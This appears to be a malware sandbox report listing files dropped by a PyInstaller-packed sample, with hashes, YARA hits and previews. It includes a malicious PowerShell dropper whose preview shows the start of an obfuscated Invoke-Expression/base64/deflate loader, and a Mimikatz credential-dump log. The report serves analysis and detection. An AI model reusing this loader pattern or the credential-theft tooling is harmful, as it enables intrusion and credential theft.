                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........'..I..I..I.......I......I..H..I.......I......I......I......I.Rich.I.........................PE..L...k..[...........!.....L...T.......1.......`.......................................................................|..H...\c..x............................ ..`...................................xb..@............`...............................text....K.......L.................. ..`.rdata.......`.......P..............@..@.data...d............n..............@....reloc..|.... ......................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\_multiprocessing.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):23552
                                                              Entropy (8bit):6.152698042687522
                                                              Encrypted:false
                                                              SSDEEP:384:ZjU247ea49tZ9w2/GqxAOKDEb2vfGnaN0GtoD2NZYNNYi/PZswUlxZZ74EBctjwL:ZQ247n4zZ9DAOR2XNr5gmltxct2
                                                              MD5:CC3B15BE403249398C53D3E7D720893F
                                                              SHA1:1AE2C4090E6E5DA395117A21618024EBE8C90219
                                                              SHA-256:6A6B8CB5CAD9769A07AF9A50BAB5B3C848B411F66D7723C7E4C65D9E7DBE08ED
                                                              SHA-512:6EC8E0EA676D5CF5DE775CB7FCB87B59D3C773BF5F080E75FBFDED0B643AF85341AD7C8F9B4153C25E11E3FBC751DDF620F7027037046081E2C23E49452CAD13
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._.._.._...B.^..A.A.\..A.W.Q..A.P.]..A.G.[.._..-..V.G.Z..A.].Z..A.F.^..A.E.^..Rich_..........................PE..L...~20L...........!.....,........../4.......@.......................................................................X..\...LN..d............................p.......A...............................M..@............@...............................text....*.......,.................. ..`.rdata..L....@.......0..............@..@.data........`.......J..............@....reloc.......p.......T..............@..B................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\_socket.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):6.398937108101329
                                                              Encrypted:false
                                                              SSDEEP:768:eSJ6zgAawxDxNoJYHOJIlVGb2zCLMxsNBC+MmvR+aDWH0:eSuxNoJYHOn2zCIxCgMvBDm0
                                                              MD5:B7C3E334648A6CBB03B550B842818409
                                                              SHA1:767BE295F1E4ADEDF0E10532F9C1B7908D17383A
                                                              SHA-256:F0781A1B879584F494D984E31869EAB13F0535825F68862E6597B1639DF708BD
                                                              SHA-512:43EE04452B685022BFDBACA5B3603D4C0E406599B8DA70C6A25FA2C4AC5543ADA4521EBA9BBF0CA86A2A4775CE474AB89DA7D27F842D63DF62048A1B7CA431D1
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t.]...]...]...C..^...C..S...C.._...C..Y...]......T.X...C..\...C..\...C..\...Rich]...........PE..L...@20L...........!.....J...V......'........`......................................................................p~..d...lt..d...............................<...@b..............................8s..@............`..(............................text...kH.......J.................. ..`.rdata.......`... ...N..............@..@.data...D*.......(...n..............@....reloc..H...........................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\_ssl.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):721408
                                                              Entropy (8bit):6.7605830575860795
                                                              Encrypted:false
                                                              SSDEEP:12288:cLo7V7/c7N5p1In0exa1hOiZOS3uliHLPpN+NSfkNCRHsaEo3ypHVhFBo2C:cLo7SPy0exEPqNSftsQCpHVXBxC
                                                              MD5:27A7A40B2B83578E0C3BFFB5A167D67A
                                                              SHA1:D20A7D3308990CE04839569B66F8639D6ED55848
                                                              SHA-256:EA0EFCAB32E6572F61A3C765356E283BD6A8F75EC2A4C8B12F1FB3DB76CA68D4
                                                              SHA-512:7B97690B9AB68562CA85CE0FFC56AE517F8FAFE44CAFF846D66BB4C2003AA6D1B0B321D9EA4526C4652B5152EC46DC600671F427957E6E847BA75CED0D09ACEF
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................s.....b.....u.........e.5........u.....h.....t.....w....Rich...........PE..L...M20L...........!.........................0...............................P..........................................D....s...................................{...2...............................................0..`............................text...!........................... ..`.rdata...O...0...P..."..............@..@.data....!...........r..............@....reloc..J............p..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\bz2.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):71680
                                                              Entropy (8bit):6.559511579750606
                                                              Encrypted:false
                                                              SSDEEP:1536:YdnlkILWTqHDSJBe12Z/gcW++ydCR5H6Iva5ZXQ98p+fRYPPDEz:alkEWTq2JK2dU+LwZ6IvaPXQSgfRqIz
                                                              MD5:0B1688C02640EC14D85E1CC3C93F7276
                                                              SHA1:03779F13640F6786E3127C76316A35A2922FC149
                                                              SHA-256:753EA279675EEB34FE58908F10CB15886955C865B49C01B533A5930E6B326038
                                                              SHA-512:0B109BB5924B20CDE6D33D335404A944C088D34F009412074D0569E62E1D3F5326F41B2A0B9AFBE2DDBEB43E3054CECDD63829A7F88E6DB6F72BCE77A9F3EC82
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......jT...5d..5d..5d.z..-5d.0g..*5d.0g..,5d.0g..+5d.'M..,5d..5e.D5d.0g..:5d.0g../5d.0g../5d.0g../5d.Rich.5d.........PE..L...C20L...........!.........P...............................................P..........................................B...<...P............................@......................................0...@............................................text............................... ..`.rdata..............................@..@.data...,1..........................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\ii.exe.manifest
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1006
                                                              Entropy (8bit):5.3035895931311785
                                                              Encrypted:false
                                                              SSDEEP:12:TMHdtnQEH5PgV4SNXvNxW5v+MHCgVuNnhSN4XKuvXOvcNg4gv18zyiUGXwcGkVtk:2dtn3ZPglN2v+zg4NnEN4XKDme5rcb3S
                                                              MD5:08458035409AF6BAEF39D93956F86E74
                                                              SHA1:B37DEF646D1107919F16BB91353E6E5F20C2A168
                                                              SHA-256:82517610333E631B6DF2D74E19F217D87824B0DFD39F9CDDDECB416F1EE66808
                                                              SHA-512:2A9276D6DE8CF9CBACF57D5B8BF169C4AE74F880467D5DE12F06A0F4594622F64DE17D4A407D4F9901A429D9FA215CC52658F9B0E6F1DC5AF28C9BA79D51D674
                                                              Malicious:false
                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">.. <assemblyIdentity name="ii" processorArchitecture="x86" type="win32" version="1.0.0.0"/>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.VC90.CRT" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b" type="win32" version="9.0.30729.6161"/>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"/>.. </dependentAssembly>.. </dependency>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>.. <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>.. <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>.. <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>.. <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>.. </application>.. </compatibility>..</ass
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\msvcm90.dll
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):225280
                                                              Entropy (8bit):6.034911041879855
                                                              Encrypted:false
                                                              SSDEEP:3072:6yZeocziNzMLSMOYscmLWbAX+dP4Upoh86Goao14JU87/amFYw8fF01OyASLE:PYOMqc8oAXGP4Upoe6fa3/amiX2Oyp
                                                              MD5:D34A527493F39AF4491B3E909DC697CA
                                                              SHA1:AFEE32FCD9CE160680371357A072F58C5F790D48
                                                              SHA-256:7A74DA389FBD10A710C294C2E914DC6F18E05F028F07958A2FA53AC44F0E4B90
                                                              SHA-512:0DABC5455EB02601D7C40A9C49B3ADE750B1118934EF3785FB314FA313437BC02B243571ABA25F1661A69DCEA36838530C12762A2E6602D14A9B03770A82CCA6
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;...h...h...h..ah...h1.dh...h..gh...h...h...h.-.h...h...h...h..qh...h..vh...h..`h...h..fh...h..ch...hRich...h........................PE..L.....M...........!.....:..........Z........P....?x.........................0......^.....@......................... 3..4....&..d...............................d...P...............................H...@...............(...........p...H............text...T9.......:.................. ..`.data........P.......>..............@....rsrc................H..............@..@.reloc...#.......$...L..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\msvcp90.dll
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):569680
                                                              Entropy (8bit):6.5222072138330525
                                                              Encrypted:false
                                                              SSDEEP:12288:66FE340h3e34GVZQACkILYhUgiW6QR7t5183Ooc8SHkC2ePgAfX:66h0h3e3vgzLA83Ooc8SHkC2ePgAfX
                                                              MD5:4C39358EBDD2FFCD9132A30E1EC31E16
                                                              SHA1:70AC82988285F9F7069FAA9A0612AEBA7FB001C4
                                                              SHA-256:06918CF99AD26CD6CF106881C0D5BDB212DC0BAC4549805C9F5906E3D03D152C
                                                              SHA-512:EB5348D2F258767281FE954D45999BD6EB7AF61411EA3A5C63FCDAFC83E487CEE51E1DFE2D86590243B21F6A135E0DD5116E66B0F22CF0937BD147E54A1DF391
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#%..Mv..Mv..Mv.66v..Mv...v..Mv..Lv:.Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..MvRich..Mv........................PE..L.....M...........!.....4...p..............P....Hx......................................@..........................P..,....E..<.......................P.......D3...................................%..@............................................text....2.......4.................. ..`.data...t'...P.......8..............@....rsrc................R..............@..@.reloc..HC.......D...V..............@..B................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\msvcr90.dll
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):653136
                                                              Entropy (8bit):6.883548749851743
                                                              Encrypted:false
                                                              SSDEEP:12288:phr4UC+Yu/A0BI4yWkoGKJwZ9axKmhYTMAO7wFVjCUmRyybD:tYfyZFGKJjxKmhSMABnCUmRyybD
                                                              MD5:CDBE9690CF2B8409FACAD94FAC9479C9
                                                              SHA1:4BCDFE2C1B354645314A4CE26B55B2B1A0212DB9
                                                              SHA-256:8E7FE1A1F3550C479FFD86A77BC9D10686D47F8727025BB891D8F4F0259354C8
                                                              SHA-512:9C84ED9A66CE20A22E14FA00C1A0DB716133F7B2450A3C0D20B1DCF74E030337C4C6A4953E40E10FC94706DC607236E773BA8999B21BD6E072AB24A487E8F942
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................6.........!.R...7.....&.....0.....6.....3...Rich..........PE..L.....M...........!.....\..........@-.......p....Rx.........................0.......M....@..............................|..P...(.......................P........3......................................@............................................text...t[.......\.................. ..`.data....g...p...D...`..............@....rsrc...............................@..@.reloc...7.......8..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\pyexpat.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):153088
                                                              Entropy (8bit):6.5763844179183755
                                                              Encrypted:false
                                                              SSDEEP:3072:OQ97b9kWENnGmC8OVVqQUQrl5tU36odGpIh342vKU6Oqngw:OQ9v96GmC8OVVqFQJ5tU36N32C5rn
                                                              MD5:136A3D873192913C40A1270352A97787
                                                              SHA1:42033EEA56AD884BE66754C6A4B6F62FA13DB5A1
                                                              SHA-256:A8561293134F940FF1C95B2BE82B24A80C22B851E8594008B567A2842A60E9AB
                                                              SHA-512:A9DDAF28D99839586B9AC8AD180D74F294092353FD5686E1592119AA4927EBF10FA6723D4AC24DB4A8027432FA04CA506BA2CA495E7DE468B948FDD79042A2E6
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.]E!o3.!o3.!o3.?=.. o3.?=..,o3.?=..#o3.?=..$o3.(...#o3.!o2.Fo3.?=..%o3.?=.. o3.?=.. o3.Rich!o3.........PE..L...y20L...........!.........n......................................................................................P?..J....5..P............................`.......................................4..@............................................text............................... ..`.rdata...?.......@..................@..@.data...h....@.......,..............@....reloc.......`.......:..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\python27.dll
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2640384
                                                              Entropy (8bit):6.7208058935807475
                                                              Encrypted:false
                                                              SSDEEP:49152:XpG1BkE5T3Ezr57DfqPRHfVX8dswLmwbr5oLEdeOPln4MdWHFdtSIqOTDjl+ey3e:s17HfVX6sAmwX98Q4MgHrt7qYZF
                                                              MD5:F5C5C0D5D9E93D6E8CB66B825CD06230
                                                              SHA1:DA7BE79DD502A89CF6F23476E5F661EEBD89342B
                                                              SHA-256:E3EED66221A6552D4B9AE7350B3DC30DE238A6029EFAE060514D2780C02FEDB4
                                                              SHA-512:8A13B15884F8450396B8F18597DFE62F0E13E7AB524D95DE5B7B0497A64E52F26B22F977803280B1916FC2B45C52A92AB501A6FB8AD86970D8326BE72F735279
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#..^g.y.g.y.g.y....~.y.n...l.y.n...i.y.n...e.y.n...l.y.g.x.[.y.n.....y.n...f.y.n...f.y.n...f.y.Richg.y.................PE..L.....UX...........!.....n...........q........................................)......9)...@......................... C!.t|..<,!.x.....(.D.................... (..[.. ................................*!.@............................................text...Zl.......n.................. ..`.rdata...?.......@...r..............@..@.data....B....!..(....!.............@....rsrc...D.....(.......&.............@..@.reloc...e... (..f....&.............@..B................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\pywintypes27.dll
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):110080
                                                              Entropy (8bit):6.570282706653416
                                                              Encrypted:false
                                                              SSDEEP:3072:XJ3S1M+tYU06cwxxKEYLRjM/HRxo1Y7bi0to70fsNOK7dZpZUJP:XxSRtYU0bwxxKEYLRjyUY7bi0q70ENOI
                                                              MD5:F3EF005E60F838EAAA44529DAEEB93AB
                                                              SHA1:0F8730CAEA9F7B16C2E90F6551A90B80B994688F
                                                              SHA-256:241ECBD87410E9B23339D494F9ECA7DDF8083472661989F489FDD7FE0B8776B4
                                                              SHA-512:8C57D5B6A5B44B26FB943B0D5DDD5D80EEAC2488E91F538E361781E727F931717BB3D5A0811AE7C8DD85122E74B08C54C3384FD2FC0DB79E0B0E7FBFC8160D20
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x..k.F.k.F.k.F6$.F.k.F.9.F.k.F.9.F.k.F...F.k.F.9.F.k.F...F.k.F.k.FQk.F.9.F.k.F.9.F.k.F.9.F.k.FRich.k.F........PE..L....dS...........!.............................z..................................................................C...J..............\............................................................*..@............................................text.............................. ..`.rdata.............................@..@.data................|..............@....rsrc...\...........................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\select.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):11776
                                                              Entropy (8bit):5.7370014656327255
                                                              Encrypted:false
                                                              SSDEEP:192:0fF9RB8SglQopt3J8z1H5KPycAXhuUXy+j3XhxeHrc1U56FKc:0fF9RB8SchZ8znhbX/bxxmuT3
                                                              MD5:DCEE0DBCF84CC9F1620F168D8F8F9FD1
                                                              SHA1:9F570FA253C24A8FE56948F4C6E79982D9644A3B
                                                              SHA-256:385E7A3CF5DD7B65590B064E7BC09F901DB7DDC8542396AF6BB60048A30993F0
                                                              SHA-512:5B89FE78E841BD05A7C4A626D9B06AA200F8C7D0EBF3B9124AA4440159636FC20CED725D2FE61DE7BB4DC210060FDDD36F785309A536293455CB863EBFF00E77
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O+..E...E...E..|...E..|...E..|....E..|...E..V...E...D...E..|...E..|...E..|...E.Rich..E.........PE..L...~20L...........!.........................0...............................`.......................................8..H....3..d............................P.......1...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...4....@.......$..............@....reloc.......P.......*..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\unicodedata.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):688128
                                                              Entropy (8bit):5.433599353373704
                                                              Encrypted:false
                                                              SSDEEP:12288:gD3I3AxoMPBt8FpQsVdFiI5mZMPXubUxktwd:gD3uxM8XQsVdXSPAxLd
                                                              MD5:5B44D0BD38C218445DDE8C913736EAAC
                                                              SHA1:DC778E6DC62006A5CCD1F206C3000E32B4439592
                                                              SHA-256:EDEC30653DC56DF03EB40FA97C616950FD593C0B90C2950AF722E66816EB70E9
                                                              SHA-512:3BB53385124C43C7C06F9AFC3CB2D81B1D623E676FEAB31F76C427A37D4B165BAD1EA8267BACC9284C1FF25C2D6BEE0BB584D2EDD774846202694458C6D099E3
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{\............................................................................Rich....................PE..L...P20L...........!.....,...R.......1.......@......................................................................`X..R...LR..P................................... A..............................0Q..@............@...............................text....+.......,.................. ..`.rdata.......@.......0..............@..@.data....+...`...*...J..............@....reloc..~............t..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\win32api.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):99328
                                                              Entropy (8bit):6.5766707412687975
                                                              Encrypted:false
                                                              SSDEEP:3072:d26TODbjcOlNJvsIxzaAl2OfGXChCVhV3LHhBNIxJ2cUDqtyAtykub:46TOPjlNJ0ozaAl2O+ChCVhVxcUDqLyj
                                                              MD5:4808FC8E377C68AFC58E512EAEB92984
                                                              SHA1:5D30FB56ABD2A4E66108A8E8CD21450A7E29DCC4
                                                              SHA-256:63112ADEBC44D8183FAA148E53CC48DDDA0A9FB11C7D15A1EF5C8B36023F1205
                                                              SHA-512:7C8994A78022499561D69893C67C4F16DCC826BA42BED01BB079324C980946A50463737E7F96F13915AA0A2728FF4555D61C33D7C7375DE69E0D71F9347F66F4
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w.z..b)..b)..b).D.)..b).D.)..b).D.)..b).n.)..b)...)..b)..c)..b).D.)..b).D.)..b).D.)..b)Rich..b)........PE..L......T...........!................<................................................................................g..~....B......................................`................................@..@...............D....B..@....................text............................... ..`.rdata..Nx.......z..................@..@.data........p.......T..............@....reloc..p........ ...d..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\win32event.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):17408
                                                              Entropy (8bit):6.077433206403434
                                                              Encrypted:false
                                                              SSDEEP:384:i6ObLkEVhuSRk78FFm/ThAdbF7EpmK+g50ewm3qrdE2nVb5yvL:SbLkEV4SBFm/ThAdbF7EpmbO5T3qrd1a
                                                              MD5:997B91AB18B0E50A458B6093A77C1F51
                                                              SHA1:8D8F247600BA0210912270F960193FB039E57BA0
                                                              SHA-256:3F2D34661FD5CC1C800C121AD8ED1077AD62888A688FEA23DCF2617ACEED2D7C
                                                              SHA-512:3EE618C1759CCDB357817F50CAB91F3F1D5D5AF3B147539F711508A7DEBE5F57C69072189B9261AF539B101047963F3A233A03517839592F431E2AC1F1AD9AFF
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........YMF.8#..8#..8#..j...8#..j...8#..j...8#..@...8#...X..8#..8"..8#..j...8#..j...8#..j...8#.Rich.8#.........................PE..L......T...........!....."...".......+.......@.......................................................................S..P...LJ..x............................p.......A..............................(I..@............@..`............................text....!.......".................. ..`.rdata.. ....@.......&..............@..@.data........`.......<..............@....reloc.......p.......>..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\win32pipe.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):23040
                                                              Entropy (8bit):6.187314720225589
                                                              Encrypted:false
                                                              SSDEEP:384:0/hOIiDSVujmVnO7aNfnVssjMDcu6Zx56DUgjZ2FDH9cJ:cE/DSYiVnO7SZu6joBQ9c
                                                              MD5:0D4A1785AA8F949CFA2A19278CBE3C81
                                                              SHA1:6E2AFE14BC7D882DA9BF02F9BEA3FA04641626B8
                                                              SHA-256:2EFC1764B23E02B2E91016EA331E68207CB5C2579166CA305A196FE343719D4D
                                                              SHA-512:F358BDACCB3C947AAEBC1F5479DCFD526D8C6D8742369E0EF6CF7EFC4060810469A25109CADE45CD93364B24CF0000A725DEB0AA45F603A210349EE8EE796FCA
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z..B>..>..>...,..<.. ...=.. ...3.. ...:..7...=..>..N.. ...:.. ...?.. ...?..Rich>..........PE..L......T...........!.....0...*......F8.......@.......................................................................Y..N....M..d............................p.......A..............................HL..@............@...............................text............0.................. ..`.rdata.......@.......4..............@..@.data........`.......P..............@....reloc.......p.......R..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\win32wnet.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):24064
                                                              Entropy (8bit):6.151705019809125
                                                              Encrypted:false
                                                              SSDEEP:384:qQRZ5g+l3KQZrpu0SwWWwe8GvNpGrxuERGgeTOaq+k8y14NWdiSPY3hTOt62Di+b:vRZ5g+l3KQZrpJI/bmOJ14c5ANOt75O2
                                                              MD5:BA30A2A5208405C1D8EECE685A9A3ADF
                                                              SHA1:D615160E7689FD1D547681D7B5FBD1ED768D568D
                                                              SHA-256:2611A0C3AC7A2C10316C6532570345EA697D03E74C56E3EB0FEA322B48FC7072
                                                              SHA-512:959010B4D8E4045AE025D7858A25061D34B2D53DDCAA498FF617238CE5AAE82598FC3731478CB60671E1B657C49621FD823333F8EA9714F0999F5D15E8B0C1A8
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................^.W......T......B......R......R.....b..............E......S......P....Rich...........PE..L......T...........!.........0.......5.......@......................................................................PY.. ...|N...............................p..p....A...............................K..@............@...............................text...J,.......................... ..`.rdata..p....@... ...2..............@..@.data...l....`.......R..............@....reloc..~....p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_acvktxbn.fky.psm1
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tiqes1kg.oh2.ps1
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\Desktop\m2.ps1
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):1900379
                                                              Entropy (8bit):5.871053699718625
                                                              Encrypted:false
                                                              SSDEEP:24576:2BALGsEFmEXSomuRSuBYT8DSC7xwsynrH6qVYidlvJcCdTMzbyOOd3A03PRRAA4W:EgEli4D1daHJemXd3A0JGvW
                                                              MD5:7AC4E48CD81B8595AADE2FF6423494E2
                                                              SHA1:85D3A859788029743F1736667AC7CBBAA7A28AF5
                                                              SHA-256:3F28CACE99D826B3FA6ED3030FF14BA77295D47A4B6785A190B7D8BC0F337E41
                                                              SHA-512:72AD9E077A95D525C2A3CFB8350AC0A55F6D3812A63C0A3F47BA6B3E70DFDA44D53D034B5D6829D1182A5B431D856DB85F88AA226807B010F383DF5374DB6633
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: apt_c16_win_wateringhole, Description: Detects code from APT wateringhole, Source: C:\Users\user\Desktop\m2.ps1, Author: @dragonthreatlab
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                               Preview: Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('
                                                              C:\Users\user\Desktop\mkatz.ini
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                              Category:dropped
                                                              Size (bytes):4201
                                                              Entropy (8bit):5.0220380193295036
                                                              Encrypted:false
                                                              SSDEEP:96:O7wHMPJMFHCMF+EifNlHCNl+z+nnnHxqnnHCnl+orIonnHwvInnnHdo6uyOdnnHd:+aMPJMFiMF+EsNliNl+zQnnonninl+oi
                                                              MD5:FA36E2EE6C40261F3339ED6A3FCEE891
                                                              SHA1:BF6A6456B5F969E1A308D680826AE972A4FCE521
                                                              SHA-256:C10540146916A7B929E8693C483E91C5E7FD80392906736B0436D6881228EFA1
                                                              SHA-512:2D425DF26E80CAD109AF7B3F9AF436280D3A5A5B1C58DD2DD566773A39DE3131E5C9EF1CDAA026F3DA7BD9981FA273D773BC36160B3C33F72D9F1AF7DFA05638
                                                              Malicious:false
                                                              Yara Hits:
                                                              • Rule: Mimikatz_Logfile, Description: Detects a log file generated by malicious hack tool mimikatz, Source: C:\Users\user\Desktop\mkatz.ini, Author: Florian Roth
